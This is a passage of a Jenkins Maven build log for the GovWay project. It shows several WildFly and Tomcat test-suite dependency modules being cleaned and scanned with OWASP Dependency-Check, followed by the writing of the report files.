Filter Analyzer (0 seconds) 17:44:18 [INFO] Created CPE Index (1 seconds) 17:44:18 [INFO] Finished CPE Analyzer (1 seconds) 17:44:18 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:18 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:18 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:18 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:18 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:18 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:18 [INFO] Analysis Complete (1 seconds) 17:44:18 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:18 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:18 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:18 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:18 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:18 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:18 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:18 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:18 [INFO] 17:44:18 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly35 >-- 17:44:18 [INFO] Building dependencies.testsuite.as.wildfly35 1.0 [38/67] 17:44:18 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly35/pom.xml 17:44:18 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:18 [INFO] 17:44:18 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:44:18 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly35 (includes = [*.jar], excludes = []) 17:44:18 [INFO] 17:44:18 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:44:18 [INFO] 17:44:18 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:44:18 [INFO] Executing tasks 17:44:23 [INFO] Executed tasks 17:44:23 [INFO] 17:44:23 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly35 --- 17:44:23 [INFO] Checking for updates 17:44:23 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:23 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:23 [INFO] Check for updates complete (74 ms) 17:44:24 [INFO] 17:44:24 17:44:24 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:24 17:44:24 17:44:24 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:24 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:24 17:44:24 17:44:24 [INFO] Analysis Started 17:44:24 [INFO] Finished File Name Analyzer (0 seconds) 17:44:24 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:24 [INFO] Finished Hint Analyzer (0 seconds) 17:44:24 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:25 [INFO] Created CPE Index (1 seconds) 17:44:26 [INFO] Finished CPE Analyzer (1 seconds) 17:44:26 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:26 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:26 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:26 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:26 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:26 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:26 [INFO] Analysis Complete (2 seconds) 17:44:26 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:26 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:26 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:26 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:26 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:26 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:26 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:26 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:26 [INFO] 17:44:26 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly36 >-- 17:44:26 [INFO] Building dependencies.testsuite.as.wildfly36 1.0 [39/67] 17:44:26 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly36/pom.xml 17:44:26 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:26 [INFO] 17:44:26 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:44:26 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly36 (includes = [*.jar], excludes = []) 17:44:26 [INFO] 17:44:26 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:44:26 [INFO] 17:44:26 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:44:26 [INFO] Executing tasks 17:44:31 [INFO] Executed tasks 17:44:31 [INFO] 17:44:31 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly36 --- 17:44:31 [INFO] Checking for updates 17:44:31 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:31 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:31 [INFO] Check for updates complete (66 ms) 17:44:31 [INFO] 17:44:31 17:44:31 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:31 17:44:31 17:44:31 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:31 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:31 17:44:31 17:44:31 [INFO] Analysis Started 17:44:31 [INFO] Finished File Name Analyzer (0 seconds) 17:44:31 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:31 [INFO] Finished Hint Analyzer (0 seconds) 17:44:31 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:33 [INFO] Created CPE Index (1 seconds) 17:44:33 [INFO] Finished CPE Analyzer (1 seconds) 17:44:33 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:33 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:33 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:33 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:33 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:33 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:33 [INFO] Analysis Complete (1 seconds) 17:44:33 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:33 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:33 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:33 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:33 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:33 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:33 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:33 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:33 [INFO] 17:44:33 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly37 >-- 17:44:33 [INFO] Building dependencies.testsuite.as.wildfly37 1.0 [40/67] 17:44:33 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly37/pom.xml 17:44:33 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:33 [INFO] 17:44:33 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:44:33 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly37 (includes = [*.jar], excludes = []) 17:44:33 [INFO] 17:44:33 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:44:33 [INFO] 17:44:33 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:44:33 [INFO] Executing tasks 17:44:38 [INFO] Executed tasks 17:44:38 [INFO] 17:44:38 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly37 --- 17:44:38 [INFO] Checking for updates 17:44:38 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:38 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:38 [INFO] Check for updates complete (77 ms) 17:44:38 [INFO] 17:44:38 17:44:38 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:38 17:44:38 17:44:38 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:38 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:38 17:44:38 17:44:38 [INFO] Analysis Started 17:44:38 [INFO] Finished File Name Analyzer (0 seconds) 17:44:38 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:38 [INFO] Finished Hint Analyzer (0 seconds) 17:44:38 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:40 [INFO] Created CPE Index (1 seconds) 17:44:40 [INFO] Finished CPE Analyzer (1 seconds) 17:44:40 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:40 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:40 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:40 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:40 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:40 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:40 [INFO] Analysis Complete (1 seconds) 17:44:40 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:40 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:40 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:40 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:40 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:40 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:40 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:40 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:40 [INFO] 17:44:40 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly38 >-- 17:44:40 [INFO] Building dependencies.testsuite.as.wildfly38 1.0 [41/67] 17:44:40 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly38/pom.xml 17:44:40 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:40 [INFO] 17:44:40 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:44:40 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly38 (includes = [*.jar], excludes = []) 17:44:40 [INFO] 17:44:40 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:44:40 [INFO] 17:44:40 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:44:40 [INFO] Executing tasks 17:44:45 [INFO] Executed tasks 17:44:45 [INFO] 17:44:45 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly38 --- 17:44:45 [INFO] Checking for updates 17:44:45 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:46 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:46 [INFO] Check for updates complete (82 ms) 17:44:46 [INFO] 17:44:46 17:44:46 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:46 17:44:46 17:44:46 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:46 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:46 17:44:46 17:44:46 [INFO] Analysis Started 17:44:46 [INFO] Finished File Name Analyzer (0 seconds) 17:44:46 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:46 [INFO] Finished Hint Analyzer (0 seconds) 17:44:46 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:47 [INFO] Created CPE Index (1 seconds) 17:44:47 [INFO] Finished CPE Analyzer (1 seconds) 17:44:47 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:47 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:47 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:47 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:47 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:47 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:47 [INFO] Analysis Complete (1 seconds) 17:44:47 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:47 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:48 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:48 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:48 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:48 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:48 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:48 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:48 [INFO] 17:44:48 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.wildfly39 >-- 17:44:48 [INFO] Building dependencies.testsuite.as.wildfly39 1.0 [42/67] 17:44:48 [INFO] from mvn/dependencies/testsuite/applicationServer/wildfly39/pom.xml 17:44:48 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:48 [INFO] 17:44:48 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:44:48 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/wildfly39 (includes = [*.jar], excludes = []) 17:44:48 [INFO] 17:44:48 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:44:48 [INFO] 17:44:48 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:44:48 [INFO] Executing tasks 17:44:53 [INFO] Executed tasks 17:44:53 [INFO] 17:44:53 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.wildfly39 --- 17:44:53 [INFO] Checking for updates 17:44:53 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:44:53 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:44:53 [INFO] Check for updates complete (115 ms) 17:44:53 [INFO] 17:44:53 17:44:53 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:44:53 17:44:53 17:44:53 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:44:53 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:44:53 17:44:53 17:44:53 [INFO] Analysis Started 17:44:53 [INFO] Finished File Name Analyzer (0 seconds) 17:44:53 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:44:53 [INFO] Finished Hint Analyzer (0 seconds) 17:44:53 [INFO] Finished Version Filter Analyzer (0 seconds) 17:44:56 [INFO] Created CPE Index (2 seconds) 17:44:56 [INFO] Finished CPE Analyzer (2 seconds) 17:44:56 [INFO] Finished False Positive Analyzer (0 seconds) 17:44:56 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:44:56 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:44:56 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:44:56 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:44:56 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:44:56 [INFO] Analysis Complete (2 seconds) 17:44:56 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:44:56 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:44:56 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:44:56 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:44:56 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:44:56 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:44:56 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:44:56 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:44:56 [INFO] 17:44:56 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat10 >-- 17:44:56 [INFO] Building dependencies.testsuite.as.tomcat10 1.0 [43/67] 17:44:56 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat10/pom.xml 17:44:56 [INFO] --------------------------------[ pom ]--------------------------------- 17:44:56 [INFO] 17:44:56 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:44:56 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/tomcat10 (includes = [*.jar], excludes = []) 17:44:56 [INFO] 17:44:56 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:44:56 [INFO] 17:44:56 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:44:56 [INFO] Executing tasks 17:45:01 [INFO] Executed tasks 17:45:01 [INFO] 17:45:01 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.tomcat10 --- 17:45:01 [INFO] Checking for updates 17:45:01 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:01 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:01 [INFO] Check for updates complete (113 ms) 17:45:02 [INFO] 17:45:02 17:45:02 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:02 17:45:02 17:45:02 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:02 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:02 17:45:02 17:45:02 [INFO] Analysis Started 17:45:02 [INFO] Finished File Name Analyzer (0 seconds) 17:45:02 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:02 [INFO] Finished Hint Analyzer (0 seconds) 17:45:02 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:04 [INFO] Created CPE Index (2 seconds) 17:45:04 [INFO] Finished CPE Analyzer (2 seconds) 17:45:04 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:04 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:04 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:04 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:04 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:04 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:04 [INFO] Analysis Complete (2 seconds) 17:45:04 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:04 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:05 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:05 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:05 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:05 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:05 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:05 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:05 [INFO] 17:45:05 [INFO] --< org.openspcoop2:org.openspcoop2.testsuite.applicationServer.tomcat11 >-- 17:45:05 [INFO] Building dependencies.testsuite.as.tomcat11 1.0 [44/67] 17:45:05 [INFO] from mvn/dependencies/testsuite/applicationServer/tomcat11/pom.xml 17:45:05 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:05 [INFO] 17:45:05 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:45:05 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/applicationServer/tomcat11 (includes = [*.jar], excludes = []) 17:45:05 [INFO] 17:45:05 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:45:05 [INFO] 17:45:05 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:45:05 [INFO] Executing tasks 17:45:10 [INFO] Executed tasks 17:45:10 [INFO] 17:45:10 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.applicationServer.tomcat11 --- 17:45:10 [INFO] Checking for updates 17:45:10 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:10 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:10 [INFO] Check for updates complete (68 ms) 17:45:10 [INFO] 17:45:10 17:45:10 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:10 17:45:10 17:45:10 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:10 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:10 17:45:10 17:45:10 [INFO] Analysis Started 17:45:10 [INFO] Finished File Name Analyzer (0 seconds) 17:45:10 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:10 [INFO] Finished Hint Analyzer (0 seconds) 17:45:10 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:12 [INFO] Created CPE Index (1 seconds) 17:45:12 [INFO] Finished CPE Analyzer (1 seconds) 17:45:12 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:12 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:12 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:12 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:12 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:12 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:12 [INFO] Analysis Complete (1 seconds) 17:45:12 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:12 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:12 [INFO] Writing JSON report to: 